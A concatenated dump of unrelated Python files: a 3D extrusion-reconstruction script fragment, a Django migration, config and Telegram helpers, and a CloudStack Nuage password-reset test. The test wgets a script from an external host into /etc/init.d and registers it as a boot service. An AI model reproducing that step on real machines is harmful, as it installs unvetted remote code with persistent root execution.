W_base_reordered = torch.gather(W_base, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
E_AX = estimate_extrusion_axis(EA_X, W_barrel_reordered, W_base_reordered, label, pred_bb_label, normalize=NORM_EIG)
## Extrusion centers
## For center prediction
predicted_centroids = torch.zeros((1, curr_n_instances, 3)).to(device)
found_centers_mask = torch.zeros((1, curr_n_instances)).to(device)
## Calculate centroids of each segment
for j in range(curr_n_instances):
### Get points on the segment
curr_segment_W = EA_W[:, :, j]
indices_pred = curr_segment_W==1
indices_pred = indices_pred.nonzero()
for b in range(1):
## get indices in current point cloud
curr_batch_idx = indices_pred[:,0]==b
## No points found in segment (1 point found is considered no points to handle .squeeze() function)
if (curr_batch_idx.nonzero().shape[0]<=1):
found_centers_mask[b,j] = 0.0
continue
curr_batch_idx = curr_batch_idx.nonzero().squeeze()
curr_batch_pt_idx = indices_pred[:,1][curr_batch_idx]
curr_segment_pc = torch.gather(curr_pc[b,:,:], 0, curr_batch_pt_idx.unsqueeze(-1).repeat(1,3))
## Get center
pred_centroid = torch.mean(curr_segment_pc, axis=0)
predicted_centroids[b, j, :] = pred_centroid
found_centers_mask[b,j] = 1.0
extents, _ = get_extrusion_extents(curr_pc, label, pred_bb_label, E_AX[:,:curr_n_instances], predicted_centroids, num_points_to_sample=1024)
extents = extents.permute(1,0,2)
## Extrusion parameters
curr_pc = curr_pc.squeeze().to("cpu").detach().numpy()
curr_normal = X.squeeze().to("cpu").detach().numpy()
curr_extrusion_labels = label.squeeze().to("cpu").detach().numpy()
curr_bb_labels = pred_bb_label.squeeze().to("cpu").detach().numpy()
curr_extrusion_axes = E_AX.squeeze()[:curr_n_instances].to("cpu").detach().numpy()
curr_extrusion_centers = predicted_centroids.squeeze(0).to("cpu").detach().numpy()
curr_extrusion_extents = extents.squeeze().to("cpu").detach().numpy()
W_soft_reordered = W_soft_reordered.squeeze().to("cpu").detach().numpy()
####
######################################
######### Sketch extraction ###########
######################################
with torch.no_grad():
### Projection based on extrusion parameters for implicit net condition
projected_pc, projected_normal, pred_scales = sketch_implicit_projection(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(curr_normal).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
projected_pc = projected_pc[:curr_n_instances]
projected_normal = projected_normal[:curr_n_instances]
pred_scales = pred_scales[:curr_n_instances]
pred_scales_repeated = pred_scales.unsqueeze(-1).unsqueeze(-1).repeat(1,1, projected_pc.shape[-2], projected_pc.shape[-1])
projected_pc /= pred_scales_repeated
projected_pc = projected_pc.reshape(-1, NUM_SK_POINT, 2)
projected_normal = projected_normal.reshape(-1, NUM_SK_POINT, 2)
global_pc = torch.cat((projected_pc, projected_normal), dim=-1)
if USE_PRETRAINED_2D:
latent_codes = loaded_pn_encoder(global_pc)
else:
latent_codes = pn_encoder(global_pc)
#####
latent_codes_init = latent_codes
######################################
### Marching cubes hyperparameters
resol = (RES,RES,RES)
ranges = ((-RANGE, RANGE), (-RANGE, RANGE), (-RANGE, RANGE))
level = LEVEL
eps = (ranges[0][1]-ranges[0][0]) / resol[0]
## Initialize volume
xy_flat = compute_grid2D(resol, ranges=ranges).unsqueeze(0).cuda()
z_dim = resol[2]
z_range = ranges[2][1] - ranges[2][0]
z_lin = np.linspace(ranges[2][0], ranges[2][1], z_dim, endpoint=False) + z_range / z_dim * 0.5
volume = torch.ones([resol[2], resol[1], resol[0]]).cuda() * -1.0
###########
######################################
##### Insert post-processing here ####
######################################
W_soft_reordered = W_soft_reordered[:, :curr_n_instances]
row_sums = W_soft_reordered.sum(axis=-1)
W_soft_reordered = W_soft_reordered / row_sums[:, np.newaxis]
### Check previous segmentation accuracy
acc = np.sum(curr_extrusion_labels==extrusion_labels[idx[:NUM_POINTS]])/curr_pc.shape[0]
print("Original accuracy: "+str(acc))
print()
###
### Hyperparameters
NEIGHBORHOOD_PERCENT = 0.02
UNCONFIDENT_PRED_LABEL = 0.6
CONSENSUS_THRESH_PERCENT = 0.8
RELABEL_THRESH_PERCENT = 0.7
NUM_ITERATIONS = 10
if SEG_PP:
## Get local neighborhood of each point in the point cloud
pc_nbrs = KDTree(curr_pc)
num_neighbors=int(curr_pc.shape[0] * NEIGHBORHOOD_PERCENT) ## let the local neighborhood be a proportion of the total number of points
distances, indices = pc_nbrs.query(curr_pc,k=num_neighbors)
indices_reshaped = np.reshape(indices, (-1))
### Do relabeling
extrusion_relabeled = []
consensus_threshold = num_neighbors * CONSENSUS_THRESH_PERCENT
relabel_threshold = num_neighbors * RELABEL_THRESH_PERCENT
prev_labels = np.copy(curr_extrusion_labels)
### Make labels (curr_n_instances) if the confidence is too low
prob_pred_label = np.max(W_soft_reordered, axis=-1)
indices_to_mask = prob_pred_label < UNCONFIDENT_PRED_LABEL
num_unknown_labels = np.sum(indices_to_mask)
print("Num unknown = "+str(num_unknown_labels))
### Mask label for unknown
prev_labels[indices_to_mask] = curr_n_instances
##### When a label as a disconnected component unlabel it
for i in range(curr_n_instances):
### Get points with label of a current instance
segment_idx = np.where(prev_labels == i)[0]
segment_points = curr_pc[segment_idx]
print(segment_points.shape)
if (segment_points.shape[0]==0):
continue
db = DBSCAN(eps=0.2, min_samples=20).fit(segment_points)
labels = db.labels_
# print(labels)
# exit()
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
print("Number of clusters for label " + str(i) + ": " + str(n_clusters_))
### Unlabel for -1
mask_idx = np.where(labels == -1)[0]
prev_labels[segment_idx[mask_idx]] = curr_n_instances
if n_clusters_ > 1:
### Find dominant segment
dominant_cluster = np.bincount(labels+1).argmax()
mask_idx = labels != (dominant_cluster-1)
prev_labels[segment_idx[mask_idx]] = curr_n_instances
##################
for j in range(NUM_ITERATIONS):
corresponding_labels = np.reshape(prev_labels[indices_reshaped], (curr_pc.shape[0], -1))
### Check for consensus in the neighborhood
hist = np.apply_along_axis(lambda x: np.bincount(x, minlength= (curr_n_instances+1)), axis=-1, arr=corresponding_labels)
extrusion_relabeled = []
for i in range(curr_pc.shape[0]):
### For unknown labeled points
if prev_labels[i] == curr_n_instances:
label_consensus = np.argmax(hist[i])
if label_consensus == curr_n_instances:
label_consensus = np.argsort(hist[i])
label_consensus = label_consensus[-2]
extrusion_relabeled.append(label_consensus)
### For known labels
else:
### If current label agrees with most of the neighbors, continue
if hist[i][prev_labels[i]] > consensus_threshold:
extrusion_relabeled.append(prev_labels[i])
### Otherwise if there is a majority, relabel
else:
### Max in histogram
label_consensus = np.argsort(hist[i])
found = False
for k in range(curr_n_instances):
if hist[i][label_consensus[k]] > relabel_threshold:
extrusion_relabeled.append(label_consensus[k])
found = True
break
if not found:
extrusion_relabeled.append(prev_labels[i])
extrusion_relabeled = np.array(extrusion_relabeled)
prev_labels = extrusion_relabeled
acc = np.sum(extrusion_relabeled==extrusion_labels[idx[:NUM_POINTS]])/curr_pc.shape[0]
print("Refined accuracy: "+str(acc))
print()
visualize_segmentation_pc_bb_v2(MODEL_ID, DUMP_DIR, curr_pc, extrusion_labels[idx[:NUM_POINTS]], curr_extrusion_labels, curr_bb_labels, curr_bb_labels, f, g)
# visualize_segmentation_pc_bb_v2(MODEL_ID, DUMP_DIR, curr_pc, curr_extrusion_labels, extrusion_relabeled, curr_bb_labels, curr_bb_labels, f, g)
f.close()
g.close()
# exit()
else:
extrusion_relabeled = curr_extrusion_labels
if SCALE_PP:
### With RANSAC ###
with torch.no_grad():
### Projection based on extrusion parameters for implicit net condition
pred_scales_refined = scale_ransac(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
pred_scales_refined = pred_scales_refined.squeeze().to("cpu").detach().numpy()
print(pred_scales_refined)
pred_scales = pred_scales_refined
#########################
if EXTENT_PP:
##### RANSAC for extent #####
extents, _ = extents_clustering(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
E_AX[:,:curr_n_instances], \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=2048)
curr_extrusion_extents = extents
print(curr_extrusion_extents)
############################
###### Render current sketches ########
for i in range(curr_n_instances):
# pnts = sketches[model_idx][i]
pnts = None
curr_latent = latent_codes_init[i]
plot_surface_2d(decoder=implicit_net,
path=plot_fol,
epoch=str(i),
shapename=MODEL_ID,
points=pnts,
latent=curr_latent,
resolution=512,mc_value=0.0,is_uniform_grid=True,verbose=False,save_html=False,save_ply=False,overwrite=True)
#######################################
######################################
######################################
######################################
if IGR_PP:
im_lr_schedules = get_learning_rate_schedules([{
"Type" : "Step",
"Initial" : 0.001,
# "Initial" : 0.0001,
"Interval" : 500,
"Factor" : 0.5
},
{
"Type" : "Step",
"Initial" : 0.001,
"Interval" : 1000,
"Factor" : 0.5
}])
im_weight_decay = 0
optimizer = torch.optim.Adam(
[ {
"params": implicit_net.parameters(),
"lr": im_lr_schedules[0].get_learning_rate(0),
"weight_decay": im_weight_decay
}
])
### Project the prediction
projected_pc, projected_normal, pred_scales = sketch_implicit_projection(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(curr_normal).unsqueeze(0).to(device), \
# torch.from_numpy(curr_extrusion_labels).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
with torch.no_grad():
pred_scales_repeated = pred_scales.unsqueeze(-1).unsqueeze(-1).repeat(1,1, projected_pc.shape[-2], projected_pc.shape[-1])
projected_pc /= pred_scales_repeated
projected_pc_ = projected_pc.reshape(-1, NUM_SK_POINT, 2)
projected_normal_ = projected_normal.reshape(-1, NUM_SK_POINT, 2)
global_pc = torch.cat((projected_pc_, projected_normal_), dim=-1)
if USE_PRETRAINED_2D:
latent_codes = loaded_pn_encoder(global_pc)
else:
latent_codes = pn_encoder(global_pc)
#####
latent_codes_init = latent_codes
### Loop through each extrusion segment and compose the volume
found = False
for i in range(curr_n_instances):
j = perm[i]
ax = curr_extrusion_axes[j]
c = curr_extrusion_centers[j]
extent = curr_extrusion_extents[j]
scale = pred_scales[j]
if np.abs(extent[0] - extent[1]) < 0.01:
print("Extrusion segment too shallow. Skipping.")
print()
continue
##### IGR Direct optimization
if IGR_PP:
if not IGR_PP_INIT:
### Always start with preloaded then directly optimize
fname = os.path.join(IM_LOGDIR, IM_CKPT)
implicit_net.load_state_dict(torch.load(fname)["model_state_dict"])
print("Loaded implcit net.")
else:
implicit_net = ImplicitNet(d_in=D_IN+LATENT_SIZE, dims = [ 512, 512, 512, 512, 512, 512, 512, 512 ], skip_in = [4], geometric_init= True, radius_init = 1, beta=100)
implicit_net.to(device)
implicit_net.train()
global_step = 0
curr_implicit_latent_code = latent_codes_init[j]
curr_implicit_latent_code = curr_implicit_latent_code.unsqueeze(0)
sk_pnts_orig = projected_pc[j]
sk_normals = projected_normal[j]
prev_lost = None
eps_lost = 1e-5
# eps_lost = 1e-7
# for it in range(1000):
for it in range(10000):
nonmnfld_pnts = sampler.get_points(sk_pnts_orig)
sk_pnts = add_latent(sk_pnts_orig, curr_implicit_latent_code)
nonmnfld_pnts = add_latent(nonmnfld_pnts, curr_implicit_latent_code)
# forward pass
sk_pnts.requires_grad_()
nonmnfld_pnts.requires_grad_()
sk_pred = implicit_net(sk_pnts)
nonmnfld_pred = implicit_net(nonmnfld_pnts)
mnfld_grad = gradient(sk_pnts, sk_pred)
nonmnfld_grad = gradient(nonmnfld_pnts, nonmnfld_pred)
sk_pred = sk_pred.reshape(1, -1, 1)
nonmnfld_grad = nonmnfld_grad.reshape(1, -1, 2)
mnfld_grad = mnfld_grad.reshape(1, -1, 2)
sk_normals = sk_normals.reshape(1, -1, 2)
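### The loss below follows the IGR (implicit geometric regularization) recipe:
### (1) projected sketch points should evaluate to zero SDF, (2) an eikonal term pushes
### |grad f| towards 1 at the sampled off-surface points, and (3) predicted gradients
### should align with the projected 2D normals up to sign.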
mnfld_loss = (sk_pred.abs()).mean(dim=-1).mean(dim=-1).mean()
# eikonal loss
grad_loss = ((nonmnfld_grad.norm(2, dim=-1) - 1) ** 2).mean(dim=-1).mean()
# normals loss
norm_sub = (mnfld_grad - sk_normals).norm(2, dim=-1)
norm_add = (mnfld_grad + sk_normals).norm(2, dim=-1)
values = torch.cat((norm_sub.unsqueeze(-1), norm_add.unsqueeze(-1)), dim=-1)
normals_loss = torch.min(values, dim=-1)[0]
normals_loss = normals_loss.mean(dim=-1).mean()
im_loss = mnfld_loss + 0.1 * grad_loss
im_loss = im_loss + 1.0 * normals_loss
optimizer.zero_grad()
im_loss.backward()
optimizer.step()
global_step += 1
if it%100 ==0:
print("IGR loss: "+str(im_loss.item()))
if prev_lost is not None:
if torch.abs(im_loss - prev_lost) < eps_lost:
break
prev_lost = im_loss
implicit_net.eval()
# pnts = sketches[model_idx][j]
pnts = None
curr_latent = latent_codes_init[j]
plot_surface_2d(decoder=implicit_net,
path=plot_fol,
epoch=str(j),
shapename=MODEL_ID+"_refined",
points=pnts,
latent=curr_latent,
resolution=512,mc_value=0.0,is_uniform_grid=True,verbose=False,save_html=False,save_ply=False,overwrite=True)
#############################
# # Edit 2
# if i == 1:
# print("Editing...")
# c -= np.array([0, 0.3, 0])
# extent = np.abs(extent) - 0.3
with torch.no_grad():
## This is for a single segment
#### Extrusion Parameters
ax = torch.from_numpy(ax).unsqueeze(0).to(xy_flat.device).float()
c = torch.from_numpy(c).unsqueeze(0).to(xy_flat.device).float()
# # ## Edit 1
# if i == 0:
# print("Editing...")
# scale *= 2
##### For transformation to sketch coordinate space
rotation_matrices = get_visualizer_rotation_matrix(ax, xy_flat.device)
#####
print("For extrusion "+str(j))
print("Extrusion axis")
print(ax)
print("Extrusion center")
print(c)
print("Extrusion scale")
print(scale)
print("Extrusion extent")
print(extent)
print()
curr_implicit_latent_code = latent_codes_init[j]
curr_implicit_latent_code = curr_implicit_latent_code.unsqueeze(0)
### Intermediate_volume
volume_intermediate = torch.ones([resol[2], resol[1], resol[0]]).cuda() * -1.0
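### Per-slice composition: for each z-slice of the grid, points are projected into the
### sketch plane of extrusion j, the 2D implicit net yields a sketch SDF, and the distance
### along the extrusion axis is tested against the extrusion extent; the resulting
### per-extrusion SDF is merged into the global volume with ops[j] (-1 is treated as a
### cut, otherwise as an additive union).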
for z_ind, z_val in enumerate(z_lin):
xyz_coord = torch.cat([xy_flat, torch.ones(1, xy_flat.shape[1], 1).cuda() * z_val], 2)
### Check if inside the sketch
xyz_coord_projected = transform_to_sketch_plane(xyz_coord, rotation_matrices, c, scale)
### Compute for occupancy
### Slow
net_input = add_latent(xyz_coord_projected, curr_implicit_latent_code)
sk_pred = implicit_net(net_input)
occupancy_sdf = (sk_pred <= 0.0).to(torch.float).T
curr_occupancy = occupancy_sdf
curr_sdf1 = sk_pred.to(torch.float).T
##########
### Check if inside the extent
dist = get_distances_on_extrusion_axis(xyz_coord, ax, c)
### Make extent bigger if it is a cut for better visualization
if ops[j] == -1:
# eps = np.max((eps, np.max(np.abs(extent))*0.02))
eps = np.max(np.abs(extent))*0.5
occupancy_extent = (torch.abs(dist) <= np.max(np.abs(extent))+eps).to(torch.float)
curr_occupancy *= occupancy_extent
curr_sdf2 = (np.max(np.abs(extent)) - torch.abs(dist)).to(torch.float)
multiplier = torch.ones(curr_sdf1.shape).to(torch.float).to(curr_sdf1.device) * -1.0
mask = torch.where((occupancy_sdf==1)&(occupancy_extent==1))
multiplier[mask] = 1.0
curr_sdf = torch.min(torch.abs(torch.cat((curr_sdf1, curr_sdf2), dim=0)), dim=0)[0] * multiplier * scale
#####
## For SDF
curr_sdf = curr_sdf.reshape([resol[0], resol[1]])
## First operation
if i == 0:
volume[z_ind] = (curr_sdf * ops[j])
else:
if ops[j] == -1:
occupancy_sdf = (sk_pred <= 0.0001).to(torch.float).T ### Some threshold to make it smooth
else:
occupancy_sdf = (sk_pred <= 0.05).to(torch.float).T ### Some threshold to make it smooth
occupancy_sdf = occupancy_sdf.reshape([resol[0], resol[1]])
occupancy_extent = occupancy_extent.reshape([resol[0], resol[1]])
### Works but a bit hacky --> Current working version
mask = torch.where((occupancy_sdf==1)&(occupancy_extent==1))
volume[z_ind][mask] = (curr_sdf * ops[j])[mask]
### Output intermediate volume
volume_intermediate[z_ind] = curr_sdf
### Save intermediate volume
volume_intermediate = volume_intermediate.to("cpu")
try:
convert_sdf_samples_to_ply(volume_intermediate, [0.,0.,0.], (ranges[0][1]-ranges[0][0]) / resol[0], os.path.join(intermediate_fol, MODEL_ID+str(i)+".ply"), level=level)
except:
continue
found = True
volume = volume.to("cpu")
print("Constructed occupancy volume")
print(torch.min(volume))
print(torch.max(volume))
try:
convert_sdf_samples_to_ply(volume, [0.,0.,0.], (ranges[0][1]-ranges[0][0]) / resol[0], os.path.join(recons_fol, MODEL_ID+".ply"), level=level)
except:
pass
if -1 in ops:
### Remove holes and artifacts
mesh = trimesh.load_mesh(os.path.join(recons_fol, MODEL_ID+".ply"))
whole_volume = mesh.volume
components = mesh.split()
thresh = 0.1
components_to_take = []
for comp in components:
vol = comp.volume
if vol > whole_volume*thresh:
components_to_take.append(comp)
mesh = trimesh.util.concatenate(components_to_take)
mesh.export(os.path.join(recons_fol, MODEL_ID+".ply"))
print()
print('Total time: {}'.format(time.time() - start_time))
|
nilq/baby-python
|
python
|
# Generated by Django 3.0.4 on 2020-04-22 13:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tutors', '0007_auto_20200416_1433'),
]
operations = [
migrations.AddField(
model_name='postanad',
name='views',
field=models.IntegerField(default=0),
),
]
|
nilq/baby-python
|
python
|
import configparser
import os
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), '../config.ini'))
STEAM_ACCOUNT = config['steam']['account_name']
STEAM_PASSWORD = config['steam']['password']
driver_path = config['selenium']['driver_path'] if config['selenium']['driver_path'].strip() else '../chromedriver'
SELENIUM_PATH = os.path.join(os.path.dirname(__file__), driver_path)
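# Expected config.ini layout (illustrative placeholder values, inferred from the keys read above):
#
#   [steam]
#   account_name = your_account
#   password = your_password
#
#   [selenium]
#   driver_path = /path/to/chromedriver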
|
nilq/baby-python
|
python
|
# Author: Guilherme Aldeia
# Contact: guilherme.aldeia@ufabc.edu.br
# Version: 1.0.0
# Last modified: 05-29-2021 by Guilherme Aldeia
r"""Interaction Transformation Evolutionary Algorithm for **regression**
This sub-module implements a specialization of the base classes ``BaseITEA``
and ``BaseITExpr`` to be used on regression tasks.
Ideally, the user should import and use only the ``ITEA_regressor``
implementation, while the ``ITExpr_regressor`` should be created by means of the
itea instead of manually by the user.
The ``ITExpr_regressor`` works just like any fitted scikit regressor,
but --- in order to avoid the creation of problematic expressions --- I
strongly discourage the direct instantiation of ``ITExpr_regressor``.
"""
from itea.regression._ITExpr_regressor import ITExpr_regressor
from itea.regression._ITEA_regressor import ITEA_regressor
__all__ = [
'ITEA_regressor'
]
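# Minimal usage sketch (hypothetical data; assumes the scikit-learn style fit/predict
# interface described in the module docstring above):
#
#   from itea.regression import ITEA_regressor
#   reg = ITEA_regressor()
#   reg.fit(X_train, y_train)
#   y_pred = reg.predict(X_test)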
|
nilq/baby-python
|
python
|
from Tkinter import *
from tkMessageBox import *
def komunikaty():
if askyesno('Give an answer!', u'Do you know what you are doing?'):
showwarning('Yes', u'As I can see, you know what you are doing.')
else:
showinfo('No', "Don't worry, you are not the only one.")
Button(text=u'Quit', command=komunikaty).pack(fill=X)
Button(text=u'Error',
command=(lambda: showerror('Error', 'And a big one'))).pack(fill=X)
mainloop()
|
nilq/baby-python
|
python
|
import json
from typing import TYPE_CHECKING
from django.urls import reverse
from telegram import Bot as TelegramBot, Update
from telegram.ext import Updater
from ..dispatcher.setup import setup_dispatcher
if TYPE_CHECKING:
from django.http import HttpRequest
from telegram.ext import Dispatcher
from ..models import Bot
__all__ = (
'set_webhook',
'get_dispatcher',
'process_webhook_event'
)
def set_webhook(
*,
bot: 'Bot',
request: 'HttpRequest',
force_https: bool = True
) -> bool:
updater = Updater(token=bot.token)
if request.scheme != 'https' and force_https:
request._get_scheme = lambda: 'https'
url = (
request.build_absolute_uri(
reverse(
'telegram-bot:webhook',
kwargs={'token': bot.token}
)
)
)
print('Webhook url:', url)
result = updater.bot.setWebhook(url)
print('Webhook result:', result)
return result
def get_dispatcher(token: str) -> 'Dispatcher':
dispatcher: 'Dispatcher' = setup_dispatcher(token=token)
return dispatcher
def process_webhook_event(
token: str,
request_body: bytes,
dispatcher: 'Dispatcher' = None
):
if not isinstance(request_body, dict):
request_body = json.loads(request_body)
bot = TelegramBot(token=token)
data = Update.de_json(request_body, bot)
if dispatcher is None:
dispatcher: 'Dispatcher' = get_dispatcher(token)
dispatcher.process_update(data)
return dispatcher
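# Usage sketch (hypothetical Django view; everything except process_webhook_event is an assumption):
#
#   def webhook_view(request, token):
#       process_webhook_event(token, request.body)
#       return JsonResponse({"ok": True})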
|
nilq/baby-python
|
python
|
import os
import xml.etree.ElementTree as ET
from shutil import copyfile
import paths
def get_all_laws():
counter=0
wrd = "".join(os.getcwd())
laws_dir=wrd+"\\akn"
for root,subFolder,files in os.walk(wrd):
for item in files:
if(item.endswith("main.xml")):
dst = wrd + paths.data_xml_law_file + str(counter)+".xml"
src=str(root)+"\\main.xml"
copyfile(src, dst)
counter += 1
get_all_laws()
|
nilq/baby-python
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Component tests for user data and password reset functionality with Nuage VSP SDN plugin
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.base import (Account,
Template,
VirtualMachine,
Volume)
from marvin.lib.common import list_templates
from marvin.lib.utils import cleanup_resources
from marvin.cloudstackAPI import updateTemplate
# Import System Modules
from nose.plugins.attrib import attr
import base64
class TestNuagePasswordReset(nuageTestCase):
"""Test user data and password reset functionality with Nuage VSP SDN plugin
"""
@classmethod
def setUpClass(cls):
super(TestNuagePasswordReset, cls).setUpClass()
return
def setUp(self):
self.cleanup = []
self.apiclient = self.testClient.getApiClient()
self.account = Account.create(
self.apiclient,
self.test_data["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.append(self.account)
self.remove_vm2 = False
return
# tearDown() - Cleans up the setup, removes the VMs
def tearDown(self):
self.debug("CLEANUP: TEARDOWN")
self.apiclient = self.testClient.getApiClient()
self.updateTemplate(self.defaultTemplateVal)
self.vm_1.delete(self.apiclient, expunge=True)
if self.remove_vm2:
self.vm_2.delete(self.apiclient, expunge=True)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.debug("Warning: Exception during cleanup: %s" % e)
return
# create_template - Creates template with the given VM object
def create_template(self, vm):
self.debug("Creating template")
list_volume = Volume.list(self.apiclient,
virtualmachineid=vm.id,
type='ROOT',
listall=True)
if isinstance(list_volume, list):
self.volume = list_volume[0]
else:
raise Exception("Exception: Unable to find root volume for VM with ID - %s" % vm.id)
self.pw_enabled_template = Template.create(
self.apiclient,
self.test_data["template"],
self.volume.id,
account=self.account.name,
domainid=self.account.domainid
)
self.assertEqual(self.pw_enabled_template.passwordenabled, True, "template is not passwordenabled")
self.cleanup.append(self.pw_enabled_template)
self.debug("Created template")
# updateTemplate - Updates value of template's password enabled setting
def updateTemplate(self, value):
self.debug("Updating value of template's password enabled setting")
cmd = updateTemplate.updateTemplateCmd()
cmd.id = self.template.id
cmd.passwordenabled = value
self.apiclient.updateTemplate(cmd)
list_template_response = list_templates(self.apiclient,
templatefilter="all",
id=self.template.id
)
self.template = list_template_response[0]
self.debug("Updated template")
# VM object is passed as an argument and its interface id is returned
def get_vm_interface_id(self, vm):
self.debug("GET VM INTERFACE ID")
nic_ext_id = self.get_externalID(vm.nic[0].id)
vm_interface = self.vsd.get_vm_interface(externalID=nic_ext_id)
vm_interface_id = vm_interface["ID"]
return vm_interface_id
# VM object is passed as an argument and its userdata URL is returned
def get_userdata_url(self, vm):
self.debug("GET USER DATA URL")
nic = vm.nic[0]
gateway = str(nic.gateway)
self.debug("GATEWAY: " + gateway)
user_data_url = 'curl "http://' + gateway + ':80/latest/user-data"'
return user_data_url
# Creates and verifies the firewall rule
def create_and_verify_fw(self, vm, public_ip, network):
self.debug("Create and verify firewall rule")
self.create_StaticNatRule_For_VM(vm, public_ip, network)
# VSD verification
self.verify_vsp_floating_ip(network, vm, public_ip.ipaddress)
fw_rule = self.create_FirewallRule(public_ip, self.test_data["ingress_rule"])
self.verify_vsp_firewall_rule(fw_rule)
vm_interface_id = self.get_vm_interface_id(vm)
pd = self.vsd.get_vm_interface_policydecisions(id=vm_interface_id)
self.debug(pd)
egressAcls = pd['egressACLs'][0]['entries']
gotFirewallPolicy = False
for acl in egressAcls:
if acl['destinationPort'] == "22-22":
gotFirewallPolicy = True
break
if not gotFirewallPolicy:
raise ValueError('No firewall policy decision in vm interface')
def stop_vm(self, vm):
self.debug("Stoping VM")
vm.stop(self.apiclient)
list_vm_response = VirtualMachine.list(self.apiclient,
id=vm.id)
if isinstance(list_vm_response, list):
vm = list_vm_response[0]
if vm.state != 'Stopped':
raise Exception("Failed to stop VM (ID: %s) " %
self.vm.id)
else:
raise Exception("Invalid response from list_virtual_machines VM (ID: %s) " %
self.vm.id)
def install_cloud_set_guest_password_script(self, ssh_client):
self.debug("GET CLOUD-SET-GUEST-PASSWORD")
cmd = "cd /etc/init.d;wget http://people.apache.org/~tsp/cloud-set-guest-password"
result = self.execute_cmd(ssh_client, cmd)
self.debug("WGET CLOUD-SET-GUEST-PASSWORD: " + result)
if "200 OK" not in result:
self.fail("failed to get file cloud-set-guest-password")
cmds = ["chmod +x /etc/init.d/cloud-set-guest-password",
"chkconfig --add cloud-set-guest-password"
]
for c in cmds:
result = self.execute_cmd(ssh_client, c)
self.debug("get_set_password_file cmd " + c)
self.debug("get_set_password_file result " + result)
@attr(tags=["advanced", "nuagevsp"], required_hardware="true")
def test_nuage_UserDataPasswordReset(self):
"""Test user data and password reset functionality with Nuage VSP SDN plugin
"""
"""
Validate the following:
1) user data
2) reset vm password.
Steps:
1. Set password enabled to false in the template.
2. Create an Isolated network - Test Network (10.1.1.1/24).
3. Deploy VM1 in Test Network
4. Verify domain,zone subnet, vm.
5. create public IP, Create Static Nat rule firewall rule and verify
6. SSH to VM should be successful
7. verify userdata
8. check cloud-set-guest-password exist.
9. if cloud-set-guest-password exist.
9.1 change template password enabled to true
9.2 verify that the template is password enabled
9.3 SSH with new password should be successful
10. else cloud-set-guest-password does not exist.
10.1 get the cloud-set-guest-password file
10.2 stop vm
10.3 create a new template with password enabled. Verify that template is password enabled.
10.4 create vm 2 with new template in Test Network
10.5 Verify vm.
10.6 create public IP, Create Static Nat rule firewall rule and verify
10.7 SSH to VM 2 should be successful
11. Reset VM password (VM_1 if guest password file exist. else it is VM2)
12 Starting VM and SSH to VM to verify new password
"""
self.debug("TEST USER DATA & PASSWORD RESET ON VM")
self.defaultTemplateVal = self.template.passwordenabled
if self.template.passwordenabled:
self.updateTemplate(False)
self.debug("CREATE AN ISOLATED NETWORK")
net_off = self.create_NetworkOffering(self.test_data["nuagevsp"]["isolated_network_offering"])
self.network_1 = self.create_Network(net_off)
self.cleanup.append(self.network_1)
expUserData = "hello world vm1"
userdata = base64.b64encode(expUserData)
self.test_data["virtual_machine_userdata"]["userdata"] = userdata
self.debug("DEPLOY VM 1 IN TEST NETWORK")
# Pass the network and name of the vm type from the testdata with the configuration for the vm
self.vm_1 = self.create_VM(self.network_1, vm_key="virtual_machine_userdata")
self.vm_1.password = self.test_data["virtual_machine_userdata"]["password"]
user_data_cmd = self.get_userdata_url(self.vm_1)
# VSD verification
self.debug("VERIFY DOMAIN, ZONE, NETWORK , and VM 1")
self.verify_vsp_network(self.domain.id, self.network_1)
self.verify_vsp_vm(self.vm_1)
self.debug("CREATE PUBLIC IP, STATIC NAT RULE, FLOATING IP, FIREWALL AND VERIFY")
public_ip_1 = self.acquire_PublicIPAddress(self.network_1)
self.create_and_verify_fw(self.vm_1, public_ip_1, self.network_1)
self.debug("SSH TO VM")
ssh = self.ssh_into_VM(self.vm_1, public_ip_1)
self.debug("VERIFY USER DATA")
self.debug("Get User Data with command: " + user_data_cmd)
adata = self.execute_cmd(ssh, user_data_cmd)
actUserData = base64.b64decode(adata)
self.debug("Response User Data=" + actUserData + ", Expected=" + expUserData)
self.assertEqual(actUserData, expUserData, "User Data Did Not Match ")
